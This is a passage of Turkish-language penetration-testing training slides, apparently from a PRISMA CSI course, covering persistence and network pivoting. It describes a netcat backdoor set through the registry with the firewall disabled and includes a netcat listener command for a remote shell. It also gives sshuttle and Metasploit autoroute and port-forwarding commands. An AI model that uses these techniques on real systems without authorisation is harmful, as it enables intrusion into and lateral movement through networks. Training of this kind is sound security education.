  • 65. www.prismacsi.com © All Rights Reserved. 65 Persistence / Kalıcılık • Netcat Kullanımı • Daha sonra registry değeri nc.exe’yi çalıştıracak şekilde ayarlanır. • Hedef systemin nc.exe dosyasını çalıştırması için firewall kuralları eklenir ve firewall devre dışı bırakılır.
  • 66. www.prismacsi.com © All Rights Reserved. 66 Persistence / Kalıcılık • Netcat Kullanımı
  • 67. www.prismacsi.com © All Rights Reserved. 67 Persistence / Kalıcılık • Netcat Kullanımı • Artık sistemdeki backdoor’umuz hazır. Netcat kullanarak istediğimiz zaman hedef sistemde shell alabiliriz. • nc –lvp 10.0.0.55 1337
  • 68. www.prismacsi.com © All Rights Reserved. 68 Pivoting • Kurumsal bir yapı hayal edin. • Dışa açık bir sunucusu mevcut ve içeride de bu sunucu diğer sistemler ile bağlantılı. • Dışarıdan bu sunucuya sızdınız ve istiyorsunuz ki iç networke de erişim sağlayabilin. • İşte tam olarak bu noktaya Pivoting! deniyor.
  • 69. www.prismacsi.com © All Rights Reserved. 69 Pivoting • Pivoting işlemini gerçekleştirmek için tünelleme teknikleri kullanabilirsiniz. • Hedef kurumun bir proxy sunucusu varsa pivoting için kaynak elinizde demektir. • SSH tünelleme teknikleri kullanılabilir • Shuttle en güzel araç • A poor man’s vpn over SSH J • sudo apt-get install sshuttle • sshuttle -r root@ipaddress 0.0.0.0/0 -vv
  • 70. www.prismacsi.com © All Rights Reserved. 70 Metasploit ile Pivoting • Metasploit içerisindeki ajan meterpreter ile de pivoting yapabilirsiniz. • Öncelikle bir routing eklemeniz gerekmektedir. • run autoroute -s network/subnet • run autoroute –p : eklediğiniz kurallara bakabilirsiniz. • Port yönlendirme de yapmak isteyebilirsiniz. • portfwd add -l 88 -p 80-r ipaddress • Firefox -> ipaddress:88
  • 71. www.prismacsi.com © All Rights Reserved. 71 UYGULAMALAR
  • 72. www.prismacsi.com © All Rights Reserved. 72 SORULAR?